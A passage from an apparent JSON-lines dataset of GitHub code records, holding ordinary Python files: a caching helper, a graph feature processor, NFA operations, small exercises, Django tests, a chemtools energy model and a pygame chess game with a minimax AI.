items_cache = json.loads(cache_data)\n caching_date = datetime.strptime(\n items_cache.get('date'), DATETIME_FORMAT)\n now = datetime.now()\n last_updated = now - caching_date\n if last_updated > timedelta(hours=chache_hours):\n items = await function(key=key, **kwargs)\n if isinstance(items, int):\n del items_cache['date']\n items_cache['last_updated'] = last_updated_timedelta_to_text(\n last_updated)\n items_cache['message'] = f\"{GetMessage(items)} {messages.get('last')}\"\n return await items_result(items_cache)\n else:\n del items_cache['date']\n items_cache['last_updated'] = last_updated_timedelta_to_text(\n last_updated)\n return await items_result(items_cache)\n else:\n items = await function(key=key, **kwargs)\n if isinstance(items, int):\n return ErrorMessage(message=GetMessage(items), status_code=items)\n items['last_updated'] = 'сейчас'\n return await items_result(items)\n","repo_name":"Semolik/ASUtimetable","sub_path":"api/utils/chache.py","file_name":"chache.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15582918460","text":"from NanoParticleTools.inputs.nanoparticle import NanoParticleConstraint, SphericalConstraint\nfrom NanoParticleTools.machine_learning.data.processors import DataProcessor\n\nfrom typing import List, Tuple, Optional\nfrom itertools import combinations_with_replacement\nfrom functools import lru_cache\nimport torch\nfrom torch_geometric.data.data import Data\nfrom monty.json import MontyDecoder\n\n\nclass GraphFeatureProcessor(DataProcessor):\n\n def __init__(self,\n log_volume: Optional[bool] = False,\n **kwargs):\n \"\"\"\n :param possible_elements:\n :param log_volume: Whether to apply a log10 to the volume to reduce orders of magnitude.\n defaults to False\n \"\"\"\n # yapf: 
disable\n super().__init__(fields=[\n 'formula_by_constraint', 'dopant_concentration', 'input'], **kwargs)\n # yapf: enable\n\n self.log_volume = log_volume\n\n @property\n @lru_cache\n def edge_type_map(self):\n edge_type_map = {}\n for i, (el1, el2) in enumerate(\n list(combinations_with_replacement(self.possible_elements, 2))):\n try:\n edge_type_map[el1][el2] = i\n except KeyError:\n edge_type_map[el1] = {el2: i}\n\n try:\n edge_type_map[el2][el1] = i\n except KeyError:\n edge_type_map[el2] = {el1: i}\n return edge_type_map\n\n def get_node_features(self, constraints,\n dopant_specifications) -> torch.Tensor:\n \"\"\"\n Here, the node feature is simply the id of the element pair\n and the distance between the layers\n \"\"\"\n\n node_features = []\n\n for i, (constraint_i, x_i, el_i,\n _) in enumerate(dopant_specifications):\n r_inner_i, r_outer_i = self.get_radii(constraint_i, constraints)\n r_mean_i = (r_outer_i + r_inner_i) / 2\n v_i = self.get_volume(r_outer_i) - self.get_volume(r_inner_i)\n\n for j, (constraint_j, x_j, el_j,\n _) in enumerate(dopant_specifications):\n r_inner_j, r_outer_j = self.get_radii(constraint_j,\n constraints)\n r_mean_j = (r_outer_j + r_inner_j) / 2\n v_j = self.get_volume(r_outer_j) - self.get_volume(r_inner_j)\n d_mean = r_mean_j - r_mean_i\n\n node_features.append([\n self.edge_type_map[el_i][el_j], d_mean, x_i, x_j, v_i, v_j\n ])\n\n node_features = torch.tensor(node_features, dtype=torch.float)\n\n if self.log_volume:\n node_features[:, -2:] = torch.log10(node_features[:, -2:])\n else:\n node_features[:, -2:] = node_features[:, -2:] / 1e6\n\n return {'x': node_features, 'num_nodes': node_features.shape[0]}\n\n def get_edge_features(self, n_nodes: int) -> torch.Tensor:\n\n # Build all the edge connections. Treat this as fully connected\n\n x, y = torch.meshgrid(torch.arange(n_nodes),\n torch.arange(n_nodes),\n indexing='xy')\n edge_index = torch.vstack(\n [x.reshape(n_nodes**2),\n y.reshape(n_nodes**2)])\n\n return {'edge_index': edge_index}\n\n def get_data_graph(self, constraints: List[NanoParticleConstraint],\n dopant_specifications: List[Tuple[int, float, str,\n str]]):\n\n output_dict = self.get_node_features(constraints,\n dopant_specifications)\n output_dict.update(self.get_edge_features(output_dict['x'].shape[0]))\n\n return output_dict\n\n def process_doc(self, doc: dict) -> dict:\n constraints = doc['input']['constraints']\n dopant_specifications = doc['input']['dopant_specifications']\n\n constraints = MontyDecoder().process_decoded(constraints)\n\n return self.get_data_graph(constraints, dopant_specifications)\n\n @property\n def is_graph(self):\n return True\n\n @property\n def data_cls(self):\n return Data\n","repo_name":"BlauGroup/NanoParticleTools","sub_path":"src/NanoParticleTools/machine_learning/models/layer_pair_GAT_model/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"34768891543","text":"import nfa\n\ndef singleton(w):\n \"\"\"Returns a NFA recognizing the language {w}.\n\n (It's not a regular operation so it technically doesn't belong in\n this module.)\n \"\"\"\n \n m = nfa.NFA()\n m.set_start(0)\n for i in range(len(w)):\n m.add_transition(nfa.Transition(i, w[i], i+1))\n m.add_accept(len(w))\n return m\n\ndef copy_into(m1, m2, offset=0):\n \"\"\"Helper function that copies states and transitions from m1 into m2,\n renumbering the states and possibly adding an offset. 
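# [Illustrative sketch, not part of the NanoParticleTools module above] What
# edge_type_map builds: combinations_with_replacement enumerates each unordered
# element pair once, and the map stores the pair id symmetrically. The dopant
# names 'Yb', 'Er', 'Nd' are placeholders.
from itertools import combinations_with_replacement

elements = ['Yb', 'Er', 'Nd']
pairs = list(combinations_with_replacement(elements, 2))
print(pairs)   # 6 pairs: ('Yb','Yb'), ('Yb','Er'), ('Yb','Nd'), ('Er','Er'), ...
edge_map = {}
for i, (e1, e2) in enumerate(pairs):
    edge_map.setdefault(e1, {})[e2] = i   # setdefault replaces the try/except
    edge_map.setdefault(e2, {})[e1] = i
print(edge_map['Er']['Yb'] == edge_map['Yb']['Er'])   # True: symmetric ids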
Does *not*\n change start or accept states.\n \"\"\"\n states = {}\n for qi, qname in enumerate(m1.states):\n m2.add_state(qi+offset)\n states[qname] = qi+offset\n for q in m1.transitions:\n for a in m1.transitions[q]:\n for t in m1.transitions[q][a]:\n m2.add_transition(nfa.Transition(states[t.q], t.a, states[t.r], t.group))\n return states[m1.start], {states[q] for q in m1.accept}\n \ndef union(m1, m2):\n \"\"\"Returns a NFA that recognizes L(m1) \\cup L(m2).\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m, offset=1)\n start2, accept2 = copy_into(m2, m, offset=1+len(m1.states))\n m.set_start(0)\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start1))\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start2))\n for q in accept1 | accept2:\n m.add_accept(q)\n return m\n\ndef concat(m1, m2):\n \"\"\"Returns a NFA that recognizes L(m1) L(m2).\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m)\n start2, accept2 = copy_into(m2, m, offset=len(m1.states))\n m.set_start(start1)\n for q in accept1:\n m.add_transition(nfa.Transition(q, nfa.EPSILON, start2))\n for q in accept2:\n m.add_accept(q)\n return m\n\ndef star(m1):\n \"\"\"Returns a NFA that recognizes L(m1)*.\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m, offset=1)\n m.set_start(0)\n m.add_accept(0)\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start1))\n for q in accept1:\n m.add_accept(q)\n m.add_transition(nfa.Transition(q, nfa.EPSILON, start1))\n return m\n\n# new group function that pads a group nfa with transitions specially marked with the number passed in\ndef group(m1, num):\n \"\"\"Returns a NFA that recognizes (L(m1)).\"\"\"\n m = nfa.NFA()\n start1, accept1 = copy_into(m1, m, offset=1)\n m.set_start(0)\n a = len(m.states)\n m.add_accept(a)\n m.add_transition(nfa.Transition(0, nfa.EPSILON, start1, num))\n for q in accept1:\n m.add_transition(nfa.Transition(q, nfa.EPSILON, a, num))\n return m","repo_name":"walkerbagley/coursework","sub_path":"CSE 30151 - Theory of Computing/cp3/regular.py","file_name":"regular.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35443586644","text":"size = int(input())\nfield = [[int(x) if x.isdigit() else x for x in input().split()] for rows in range(size)]\nplayer_position = []\nwalls_positions = []\nPLAYER = 'P'\nWALL = 'X'\npath = []\n\nfor row in range(size):\n for col in range(size):\n el = field[row][col]\n if el == PLAYER:\n player_position.append([row, col])\n path.append([row, col])\n field[row][col] = 0\n elif el == WALL:\n walls_positions.append([row, col])\n# print(field)\ndirections_dict = {\n 'up': (-1, 0), # up\n 'down': (1, 0), # down\n 'right': (0, 1), # right\n 'left': (0, -1), # left\n}\n\n# print(player_position)\n# print(walls_positions)\ncoins = 0\nhits_wall = False\n\nwhile not hits_wall and coins <= 100:\n command = input()\n\n if command not in directions_dict.keys():\n continue\n\n row = player_position[0][0]\n col = player_position[0][1]\n x = directions_dict[command][0]\n y = directions_dict[command][1]\n r = row + x\n c = col + y\n if r < 0:\n r = size - 1\n if r == size:\n r = 0\n if c < 0:\n c = size - 1\n if c == size:\n c = 0\n curr_pos = field[r][c]\n if curr_pos == WALL:\n hits_wall = True\n path.append([r, c])\n break\n elif curr_pos > 0:\n coins += curr_pos\n field[r][c] = 0\n\n path.append([r, c])\n else:\n path.append([r, c])\n player_position[0] = [r, c]\n\n# print(coins)\n# print(*path)\nif coins > 99:\n print(f\"You 
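# [Illustrative sketch] Composing the regular operations defined in regular.py
# above; assumes that module and its nfa companion from the same repo are
# importable. Builds an NFA for the regular expression (ab|b)*.
import regular

m_ab = regular.concat(regular.singleton("a"), regular.singleton("b"))
machine = regular.star(regular.union(m_ab, regular.singleton("b")))
# `machine` now accepts "", "ab", "b", "abb", "bab", ... via epsilon transitions.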
won! You've collected {coins} coins.\")\nelse:\n print(f\"Game over! You've collected {int(coins * 0.5)} coins.\")\n\nprint(\"Your path:\")\nprint(*path, sep=\"\\n\")","repo_name":"maon0002/Python-Advanced-January-2023","sub_path":"past_exams/problem_2__collecting_coins.py","file_name":"problem_2__collecting_coins.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38931257728","text":"import pickle\nimport os\n\ndef print_title_bar(_games):\n print(\"**********************************************\")\n print(\"*** Games list - there are currently %d games in the list ***\" % len(_games) )\n print(\"**********************************************\")\n\ndef load_games_list(_games):\n if len(_games) > 0:\n for game in _games:\n print(\"The following game was loaded from the file: %s\" % game)\n else:\n print(\"There was no list of games to load.\")\n\ndef add_game(_games):\n new_game = \"\"\n in_list = False\n new_game = input(\"Enter a new game to add to the list: \")\n for game in _games:\n if new_game == game:\n print(\"That game is already in your list.\")\n in_list = True\n if in_list == False:\n _games.append(new_game)\n return _games\n\ndef quit():\n try:\n file_object = open(\"Exercise_6.3.pydata\", \"wb\")\n pickle.dump(games, file_object)\n file_object.close()\n\n print(\"I will remember the following games: \")\n for game in games:\n print(game)\n except Exception as e:\n print(e)\n print(\"I couldn't figure out how to store the games, sorry.\")\n os.system(\"pause\")\n\ndef run_program(_games):\n choice = \"\"\n while choice != \"3\":\n print_title_bar(_games)\n choice = input(\"[1] See current list of games. \\n[2] Add a game to your list. \\n[3] Quit the application. \")\n if choice == \"1\":\n load_games_list(_games)\n os.system(\"pause\")\n os.system(\"cls\")\n elif choice == \"2\":\n games = add_game(_games)\n os.system(\"pause\")\n os.system(\"cls\")\n elif choice == \"3\":\n quit()\n else:\n print(\"Sorry, that is not an accepted input. 
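# [Illustrative sketch, not part of the game script above] The four boundary
# checks in the movement loop can be collapsed into Python's modulo operator,
# which already wraps negative values, giving the same toroidal field:
size = 4
for row, dx in [(0, -1), (3, 1), (2, 1)]:
    print((row + dx) % size)   # -1 % 4 == 3 and 4 % 4 == 0: wrap-around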
Please try again.\")\n os.system(\"pause\")\n\ntry:\n file_object = open(\"Exercise_6.3.pydata\", \"rb\")\n games = pickle.load(file_object)\n file_object.close()\nexcept:\n games = []\n\nrun_program(games)\n","repo_name":"EmissaryEntertainment/3D-Scripting","sub_path":"Week_6/McSpadden_Exercise_6.3.py","file_name":"McSpadden_Exercise_6.3.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41042065645","text":"from django.utils import unittest\nfrom djangovoice.models import *\n\n\nclass StatusTestCase(models.Model):\n def setUp(self):\n self.in_progress = Status.objects.create(\n title='In progress', slug='in_progress', default=False)\n self.need_to_test = Status.objects.create(\n title='Need to test', slug='need_to_test', default=True)\n\n def testSpeaking(self):\n self.assertEqual(self.in_progress.status, 'open')\n self.assertEqual(self.need_to_test.default, True)\n\n\nclass TypeTestCase(unittest.TestCase):\n def setUp(self):\n self.bug = Type.objects.create(title='Bug', slug='bug')\n self.betterment = Type.objects.create(title='Betterment',\n slug='betterment')\n\n def testSpeaking(self):\n self.assertEqual(self.bug.slug, 'bug')\n self.assertEqual(self.betterment.title, 'Betterment')\n\n\nclass FeedbackTestCase(unittest.TestCase):\n def setUp(self):\n feedback_type = Type.objects.create(title='Bug', slug='bug')\n feedback_user = User.objects.create_user(\n username='djangovoice', email='django@voice.com')\n self.login_form_does_not_work = Feedback.objects.create(\n type=feedback_type,\n title='Login form does not work.',\n description='What a fucking test...',\n anonymous=False,\n private=True,\n user=feedback_user)\n\n def testSpeaking(self):\n default_status = Status.objects.get(default=True)\n self.assertEqual(self.login_form_does_not_work.status, default_status)\n","repo_name":"rossp/django-voice","sub_path":"djangovoice/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33189807807","text":"import math\nimport numpy as np\n\nfrom chemtools.conceptual.base import BaseGlobalTool\nfrom chemtools.conceptual.utils import check_dict_values, check_number_electrons\nfrom chemtools.utils.utils import doc_inherit\n\n\n__all__ = ['RationalGlobalTool']\n\n\nclass RationalGlobalTool(BaseGlobalTool):\n r\"\"\"\n Class of global conceptual DFT reactivity descriptors based on the rational energy model.\n\n The energy is approximated as a 3-parameter rational function of the number of electrons,\n\n .. math:: E(N) = \\frac{a_0 + a_1 N}{1 + b_1 N}\n\n Given :math:`E(N_0 - 1)`, :math:`E(N_0)` and :math:`E(N_0 + 1)` values, the unknown parameters\n of the energy model are obtained by interpolation.\n\n The :math:`n^{\\text{th}}`-order derivatives of the rational energy model with respect to\n the number of electrons at fixed external potential is given by:\n\n .. 
math::\n        \left(\frac{\partial^n E}{\partial N^n} \right)_{v(\mathbf{r})} =\n        \frac{(-b_1)^{n - 1} (a_1 - a_0 b_1) n!}{(1 + b_1 N)^{n + 1}}\n    """\n\n    def __init__(self, dict_energy):\n        r"""Initialize rational energy model to compute global reactivity descriptors.\n\n        Parameters\n        ----------\n        dict_energy : dict\n            Dictionary of number of electrons (keys) and corresponding energy (values).\n            This model expects three energy values corresponding to three consecutive number of\n            electrons differing by one, i.e. :math:`\{(N_0 - 1): E(N_0 - 1), N_0: E(N_0),\n            (N_0 + 1): E(N_0 + 1)\}`. The :math:`N_0` value is considered as the reference number\n            of electrons.\n        """\n        # check number of electrons & energy values\n        n_ref, energy_m, energy_0, energy_p = check_dict_values(dict_energy)\n        # check energy values\n        if not energy_m > energy_0 >= energy_p:\n            energies = [energy_m, energy_0, energy_p]\n            raise ValueError("For rational model, the energy values for consecutive number of "\n                             "electrons should be monotonic! E={0}".format(energies))\n        # calculate parameters a0, a1 and b1 of rational energy model\n        param_b1 = - (energy_p - 2 * energy_0 + energy_m)\n        param_b1 /= ((n_ref + 1) * energy_p - 2 * n_ref * energy_0 + (n_ref - 1) * energy_m)\n        param_a1 = (1 + param_b1 * n_ref) * (energy_p - energy_0) + (param_b1 * energy_p)\n        param_a0 = - param_a1 * n_ref + energy_0 * (1 + param_b1 * n_ref)\n        self._params = [param_a0, param_a1, param_b1]\n        # calculate N_max\n        n_max = float('inf')\n        super(RationalGlobalTool, self).__init__(n_ref, n_max)\n        self.dict_energy = dict_energy\n\n    @property\n    def params(self):\n        """Parameter :math:`a_0`, :math:`a_1` and :math:`b_1` of energy model."""\n        return self._params\n\n    @doc_inherit(BaseGlobalTool)\n    def energy(self, n_elec):\n        # check n_elec argument\n        check_number_electrons(n_elec, self._n0 - 1, self._n0 + 1)\n        # evaluate energy\n        if np.isinf(n_elec):\n            # limit of E(N) as N goes to infinity equals a1/b1\n            value = self._params[1] / self._params[2]\n        else:\n            value = (self._params[0] + self._params[1] * n_elec) / (1 + self._params[2] * n_elec)\n        return value\n\n    @doc_inherit(BaseGlobalTool)\n    def energy_derivative(self, n_elec, order=1):\n        # check n_elec argument\n        check_number_electrons(n_elec, self._n0 - 1, self._n0 + 1)\n        # check order\n        if not (isinstance(order, int) and order > 0):\n            raise ValueError("Argument order should be an integer greater than or equal to 1.")\n        # evaluate derivative\n        if np.isinf(n_elec):\n            # limit of E(N) derivatives as N goes to infinity equals zero\n            deriv = 0.0\n        else:\n            deriv = (-self._params[2])**(order - 1)\n            deriv *= (self._params[1] - self._params[0] * self._params[2]) * math.factorial(order)\n            deriv /= (1 + self._params[2] * n_elec)**(order + 1)\n        return deriv\n","repo_name":"theochem/chemtools","sub_path":"chemtools/conceptual/rational.py","file_name":"rational.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"}
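# [Illustrative sketch, not part of chemtools] Fitting the three-parameter
# rational model by hand with the same interpolation formulas as __init__;
# the energy values and N0 below are invented for demonstration.
n0 = 10.0
e_m, e_0, e_p = -0.5, -0.6, -0.61          # E(N0-1), E(N0), E(N0+1)

b1 = -(e_p - 2 * e_0 + e_m) / ((n0 + 1) * e_p - 2 * n0 * e_0 + (n0 - 1) * e_m)
a1 = (1 + b1 * n0) * (e_p - e_0) + b1 * e_p
a0 = -a1 * n0 + e_0 * (1 + b1 * n0)

energy = lambda n: (a0 + a1 * n) / (1 + b1 * n)
mu = (a1 - a0 * b1) / (1 + b1 * n0) ** 2   # first derivative = chemical potential
print(round(energy(n0), 6), round(mu, 4))  # recovers E(N0) = -0.6; mu lies
                                           # between -IP = -0.1 and -EA = -0.01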
+{"seq_id":"27957001805","text":"import pygame\nimport sys\nimport time\nimport random\n\nfrom setting import Config, sounds\nfrom tools import OnBoard, Position\nfrom utils import ch\nfrom board import Board\nfrom Minimax.chessAI import Minimax\nimport ui\n\nclass Chess:\n    def __init__(self, screen):\n        self.screen = screen\n        self.clock = pygame.time.Clock()\n        self.gameOver = False\n        self.board = Board()\n        self.animateSpot = 1\n        self.selectedPiece = None\n        self.selectedPieceMoves = None\n        self.selectedPieceCaptures = None\n        self.positionsToPut = None\n        self.captura = None \n        self.draggedPiece = None\n        self.IAGame = None\n        self.AdjustedMouse = Position(0, 0)\n        self.gameOverBackground = pygame.image.load("./assets/images/gameover3.jpg")\n        self.gameOverBackground = pygame.transform.smoothscale(self.gameOverBackground, Config.resolution)\n        self.gameOverHeader = ui.TextUI(self.screen, "GAME OVER", Config.width//2, Config.height//6, 140, (255, 255, 255))\n        self.gameOverHeader.centered = True\n        self.winnerText = ui.TextUI(self.screen, " ", Config.width//2, Config.height//2 + 30, 110, (255, 255, 255))\n        self.winnerText.centered = True\n\n        # Minimax(depth, board, enable alpha-beta pruning = Default(true), use point maps = Default(true))\n        self.ComputerAI = Minimax(Config.AI_DEPTH, self.board, True, True)\n\n    def vsComputer(self):\n        pygame.event.clear()\n        sounds.game_start_sound.play()\n        while not self.gameOver:\n            self.IAGame = True\n            self.clock.tick(Config.fps)\n            self.screen.fill((0, 0, 0))\n            self.getMousePosition()\n            # update the window title\n            pygame.display.set_caption("Chess : VS Computer ")\n            self.display()\n            self.ComputerMoves(1)\n            if self.gameOver == False:\n                if self.animateSpot >= Config.spotSize:\n                    self.HandleEvents()\n            self.IsGameOver()\n\n    def multiplayer(self):\n        pygame.event.clear() # clear the event queue\n        sounds.game_start_sound.play() # play the game-start sound\n        while not self.gameOver: # runs while gameOver is False\n            self.IAGame = False\n            self.clock.tick(Config.fps)\n            self.screen.fill((0, 0, 0))\n            self.getMousePosition()\n            # update the window title\n            pygame.display.set_caption("Chess : Multiplayer ")\n            self.display()\n            if self.animateSpot >= Config.spotSize: # if the animation has finished\n                self.HandleEvents() # event handling\n            self.IsGameOver()\n\n    def display(self):\n        "Render the screen"\n        self.Render()\n        pygame.display.update()\n\n    def HandleEvents(self):\n        "Event handling"\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT: # if the program is closed\n                self.gameOver = True # game finished\n                # close Pygame\n                pygame.quit()\n                sys.exit()\n            elif event.type == pygame.KEYUP: # a key was released\n                if event.key == pygame.K_ESCAPE: # if it is Escape\n                    self.gameOver = True\n                # up or down arrows change the board theme\n                if event.key == pygame.K_UP:\n                    if Config.themeIndex < len(Config.themes) -1 :\n                        Config.themeIndex += 1\n                    else:\n                        Config.themeIndex = 0\n                if event.key == pygame.K_DOWN:\n                    if Config.themeIndex > 0:\n                        Config.themeIndex -= 1\n                    else:\n                        Config.themeIndex = len(Config.themes) -1\n            elif event.type == pygame.MOUSEBUTTONDOWN: # on mouse click\n                if event.button == 1:\n                    self.HandleOnLeftMouseButtonDown() # press\n            elif event.type == pygame.MOUSEBUTTONUP:\n                if event.button == 1:\n                    self.HandleOnLeftMouseButtonUp() # release\n\n    def ComputerMoves(self, player):\n        "AI moves"\n        if self.board.player == player:\n            piece, bestmove = self.ComputerAI.Start(0)\n            if bestmove:\n                if self.board.GetPiece(bestmove) != None:\n                    self.board.Move(piece, bestmove, captura = False, IAGame = True)\n                    if self.board.pieceToPromote != None:\n                        self.board.PromotePawn(self.board.pieceToPromote, 0)\n                    self.positionsToPut = self.board.GetPositionsToPut()\n                    nuevaPosicionCapturada = self.GeneratorOfIAPositions()\n                    self.board.PutCapturedPiece(nuevaPosicionCapturada)\n                    sounds.capture_sound.play()\n                else:\n                    self.board.Move(piece, bestmove, captura = False, IAGame = True)\n                    if self.board.pieceToPromote != None:\n                        self.board.PromotePawn(self.board.pieceToPromote, 0)\n                    sounds.move_sound.play()\n                    self.positionsToPut = None\n                self.board.SwitchTurn()\n
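# [Illustrative sketch, NOT the project's Minimax class] The generic alpha-beta
# scheme the constructor comment above refers to, shown as the textbook
# recursion on a toy game tree with invented scores.
def alphabeta(node, depth, alpha, beta, maximizing):
    children = node.get("children")
    if depth == 0 or not children:
        return node["score"]
    if maximizing:
        value = float("-inf")
        for child in children:
            value = max(value, alphabeta(child, depth - 1, alpha, beta, False))
            alpha = max(alpha, value)
            if alpha >= beta:   # prune: the opponent will never allow this branch
                break
        return value
    value = float("inf")
    for child in children:
        value = min(value, alphabeta(child, depth - 1, alpha, beta, True))
        beta = min(beta, value)
        if alpha >= beta:
            break
    return value

tree = {"children": [{"score": 3}, {"score": 5}, {"score": 2}]}
print(alphabeta(tree, 2, float("-inf"), float("inf"), True))   # -> 5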
self.board.PromotePawn(self.board.pieceToPromote, 0)\n sounds.move_sound.play()\n self.positionsToPut = None\n self.board.SwitchTurn()\n\n def GeneratorOfIAPositions(self):\n randomTuple = random.choice(self.positionsToPut)\n x, y = randomTuple\n randomPosition = Position(x, y)\n return randomPosition\n \n def HandleOnLeftMouseButtonUp(self):\n \"Manejo de soltar el click izquierdo\"\n self.draggedPiece = None # Suelta la pieza\n if self.selectedPiece: # Si existe una pieza seleccionada\n if self.AdjustedMouse in self.selectedPieceCaptures: # Si la posición del mouse ajustada está en una posición de piezas a capturar\n self.board.Move(self.selectedPiece, self.AdjustedMouse, captura = True) # Mueve la pieza seleccionada para realizar la captura\n self.positionsToPut = self.board.GetPositionsToPut()\n sounds.capture_sound.play() # Activa el sonido de captura \n elif self.AdjustedMouse in self.selectedPieceMoves : # Si la posición del mouse ajustada está en una posición disponible para mover\n self.board.Move(self.selectedPiece, self.AdjustedMouse, captura = False) # Mueve la pieza seleccionada a la casilla\n self.board.SwitchTurn()\n sounds.move_sound.play() # Activa el sonido de movimiento\n \n self.ReleasePiece() # Libera la pieza\n\n def SelectPiece(self,piece):\n \"Seleccionar pieza\"\n if piece != None and piece.color == self.board.player: # Si hay una pieza y es del color del jugador actual\n self.selectedPiece = piece # Pieza seleccionada toma el valor de la pieza almacenada\n self.draggedPiece = piece # Pieza agarrada toma el valor de la pieza almacenada\n self.selectedPieceMoves, self.selectedPieceCaptures = self.board.GetAllowedMoves(self.selectedPiece) # Obtiene los movimientos posibles de la pieza agarrada junto con sus posibles capturas\n self.selectedOrigin = self.AdjustedMouse # Origen del seleccionado es la posición ajustada del mouse al momento de dar click\n\n def CheckEmptyPositions(self, position):\n nuevaPosicionCapturada = position.GetCopy()\n for posicion in self.positionsToPut:\n if nuevaPosicionCapturada.x == posicion[0] and nuevaPosicionCapturada.y == posicion[1]:\n # La nueva posición capturada es igual a una posición en la lista\n self.board.PutCapturedPiece(nuevaPosicionCapturada)\n self.positionsToPut = None\n self.board.SwitchTurn()\n break # Termina el bucle si se encuentra una coincidencia\n \n def HandleOnLeftMouseButtonDown(self):\n \"Manejo de presionar el click izquierdo\"\n # Si hay una pieza a promover y la posición ajustada del mouse es la misma que la de la pieza \n if self.board.pieceToPromote != None and self.AdjustedMouse.x == self.board.pieceToPromote.position.x: \n choice = self.AdjustedMouse.y\n if choice <= 3 and self.board.player == 0:\n # promote pawn\n self.board.PromotePawn(self.board.pieceToPromote, choice)\n # refresh screen\n self.display()\n elif choice > 3 and self.board.player == 1:\n # promote pawn\n self.board.PromotePawn(self.board.pieceToPromote, 7-choice)\n # refresh screen\n self.display()\n \n elif self.positionsToPut:\n nuevaPosicionCapturada = self.AdjustedMouse \n self.CheckEmptyPositions(nuevaPosicionCapturada) \n\n # Si no hay piezas a promover ni capturas \n else: \n if OnBoard(self.AdjustedMouse): # Si el mouse se encuentra dentro del tablero de juego\n piece = self.board.grid[self.AdjustedMouse.x][self.AdjustedMouse.y] # Almacena la pieza de la posición ajustada en la que dio click el mouse\n self.SelectPiece(piece)\n\n def getMousePosition(self):\n \"Obtener la posición ajustada del mouse\"\n x, y = 
pygame.mouse.get_pos()\n x = (x - Config.horizontal_offset) // Config.spotSize\n y = (y - Config.top_offset//2) // Config.spotSize\n self.AdjustedMouse = Position(x, y)\n\n def IsGameOver(self):\n \"Pregunta si el juego ha terminado\"\n if self.board.winner != None: #Si hay un ganador\n self.gameOver = True # Termina el juego (rompe el bucle)\n self.display() \n self.gameOverWindow()\n\n def ReleasePiece(self):\n \"Soltar pieza (reinicia todos los valores de la misma)\"\n self.selectedPiece = None\n self.selectedPieceMoves = None\n self.selectedPieceCaptures = None\n self.draggedPiece = None\n self.selectedOrigin = None\n\n def Render(self):\n \"Dibujar tablero, piezas y resaltados\"\n self.DrawChessBoard() #Tablero\n if self.animateSpot >= Config.spotSize: #Si la animación finalizó\n self.DrawPieces() #Dibuja las piezas\n self.DrawHighlight()\n if self.IAGame == True:\n if self.board.player == 0:\n self.DrawPositionsToPut()\n \n elif self.IAGame ==False: \n self.DrawPositionsToPut()\n \n def DrawChessBoard(self):\n \"Dibujar el tablero\"\n if self.animateSpot < Config.spotSize:\n self.animateSpot += 2\n for i in range(Config.boardSize):\n for j in range(Config.boardSize):\n x = i * Config.spotSize + Config.horizontal_offset\n y = j * Config.spotSize + Config.top_offset // 2\n if (i + j) % 2 == 0:\n pygame.draw.rect(self.screen, Config.themes[Config.themeIndex][\"light\"], [x, y, self.animateSpot, self.animateSpot])\n else:\n pygame.draw.rect(self.screen, Config.themes[Config.themeIndex][\"dark\"], [x, y, self.animateSpot, self.animateSpot])\n\n def DrawChessCoordinate(self):\n \"Dibujar coordenadas\"\n for i in range(Config.boardSize):\n _x = 0.05 * Config.spotSize + Config.horizontal_offset\n _y = 0.05 * Config.spotSize + Config.top_offset + i * Config.spotSize\n color = Config.themes[Config.themeIndex]['dark'] if i % 2 == 0 else Config.themes[Config.themeIndex]['light']\n\n fontRenderer = Config.CoordFont.render(str(8-i), True, color)\n self.screen.blit(fontRenderer, (_x, _y))\n\n _x = 0.9 * Config.spotSize + Config.horizontal_offset + i * Config.spotSize\n _y = (Config.boardSize - 1) * Config.spotSize + Config.top_offset + Config.spotSize * 0.75\n color = Config.themes[Config.themeIndex]['light'] if i % 2 == 0 else Config.themes[Config.themeIndex]['dark']\n\n fontRenderer = Config.CoordFont.render(chr(ord(\"a\")+ i), True, color)\n self.screen.blit(fontRenderer, (_x, _y))\n\n def DrawPieces(self):\n \"Dibuja las piezas\"\n # Dibuja posición vieja y nueva\n oldPosition, nPosition = self.board.RecentMovePositions()\n if oldPosition and nPosition:\n x1 = oldPosition.x * Config.spotSize + Config.horizontal_offset\n y1 = oldPosition.y * Config.spotSize + Config.top_offset // 2\n x2 = nPosition.x * Config.spotSize + Config.horizontal_offset\n y2 = nPosition.y * Config.spotSize + Config.top_offset // 2\n pygame.draw.rect(self.screen, (0, 100, 100), [x1, y1, Config.spotSize, Config.spotSize])\n pygame.draw.rect(self.screen, (225, 120, 120), [x2, y2, Config.spotSize, Config.spotSize]) \n\n #Dibuja los sprites de las piezas \n for x in range(Config.boardSize):\n for y in range(Config.boardSize):\n x_pos = x * Config.spotSize + Config.horizontal_offset\n y_pos = y * Config.spotSize + Config.top_offset // 2\n if self.board.grid[x][y] != None:\n self.screen.blit(self.board.grid[x][y].sprite, (x_pos, y_pos))\n\n def DrawPositionsToPut(self):\n if self.positionsToPut != None:\n for position_x, position_y in self.positionsToPut:\n x = position_x * Config.spotSize + Config.horizontal_offset\n y = 
